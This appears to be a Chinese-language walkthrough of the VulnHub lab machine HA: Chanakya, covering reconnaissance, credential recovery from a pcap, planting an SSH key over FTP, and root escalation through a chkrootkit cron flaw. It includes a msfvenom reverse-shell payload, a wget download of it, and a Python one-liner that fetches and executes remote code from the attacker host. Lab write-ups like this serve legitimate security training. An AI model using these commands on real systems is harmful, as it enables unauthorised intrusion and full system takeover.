chanakya
仅供个人娱乐
参考http://www.saulgoodman.cn/HA-Chanakya.html
靶机信息
https://www.vulnhub.com/entry/ha-chanakya,395/
一、主机探测
arp-scan -l
![](https://upload-images.jianshu.io/upload_images/4664072-a5bbb87e8b3c10d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nmap -sV -p 1-65535 -A 192.168.236.136
![](https://upload-images.jianshu.io/upload_images/4664072-a00285317f4ae63e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
dirb http://192.168.236.136
![](https://upload-images.jianshu.io/upload_images/4664072-978be0a74e20927e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-97cef97bb0f615c1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a63cd5372f1ae1ab.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-58a5a0b9f966100b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ce363fce39d758a1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-1dcae495ea67689c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、漏洞的查找和利用
百度 得到ROT13的加密方式
![](https://upload-images.jianshu.io/upload_images/4664072-39a2c1600392454e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
pcap流量包,直接下载即可
![](https://upload-images.jianshu.io/upload_images/4664072-962e0604efb99fa3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9ba25d60ec49f703.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ashoka kautilya
首先进行21端口登录
![](https://upload-images.jianshu.io/upload_images/4664072-42f9e04068e8861a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
22端口登陆失败
![](https://upload-images.jianshu.io/upload_images/4664072-c84e8388e744372d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
创建ssh-keygen
上传.ssh 使用kali免密登录
ssh-keygen
![](https://upload-images.jianshu.io/upload_images/4664072-38ab6939691c2e8b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中
root@kali:~/桌面# cd ~/.ssh
root@kali:~/.ssh# cat id_rsa.pub > authorized_keys
![](https://upload-images.jianshu.io/upload_images/4664072-2f1f4da8cfa78658.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
mkdir .ssh
cd.ssh
put authorized_keys
![](https://upload-images.jianshu.io/upload_images/4664072-2ee3b7dd414aa82c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
root@kali:~/.ssh# ssh ashoka@192.168.236.136
![](https://upload-images.jianshu.io/upload_images/4664072-3ed2b1969f5dfb45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
提权
先msf生成一个木马反弹一个meterpreter回话过来
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf
![](https://upload-images.jianshu.io/upload_images/4664072-4034f7e0235e0d91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -m SimpleHTTPServer
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.236.129
![](https://upload-images.jianshu.io/upload_images/4664072-55c5d07e9925e605.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
cd /tmp
wget http://192.168.236.129:8000/shell.elf
![](https://upload-images.jianshu.io/upload_images/4664072-6e2644a4ac65a0b8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6a3421b509aa29f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
sysinfo
使用post模块来查看可以利用那些提权exploit:
run post/multi/recon/local_exploit_suggester
![](https://upload-images.jianshu.io/upload_images/4664072-c03c87f6a0994a54.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
info exploit/linux/local/netfilter_priv_esc_ipv4
![](https://upload-images.jianshu.io/upload_images/4664072-5a4e4ea390f16303.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-eb521c01df0b0fbf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
失败
使用命令注入来反弹一个shell:
use exploit/multi/script/web_delivery
![](https://upload-images.jianshu.io/upload_images/4664072-fb26c2e3252f1502.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
set lhost 192.168.236.129
![](https://upload-images.jianshu.io/upload_images/4664072-3307115f74d1cfce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"
在目标机运行:
![](https://upload-images.jianshu.io/upload_images/4664072-e9dbb96ea2fc1137.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用rootkit攻击模块:
![](https://upload-images.jianshu.io/upload_images/4664072-617a47c6520ed61d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。
set rhosts 192.168.236.136
set session 1
set lport 8888
exploit
python -c'import pty;pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-9f339371eb3378d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3ade2781ebeba734.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
参考文章http://www.saulgoodman.cn/HA-Chanakya.html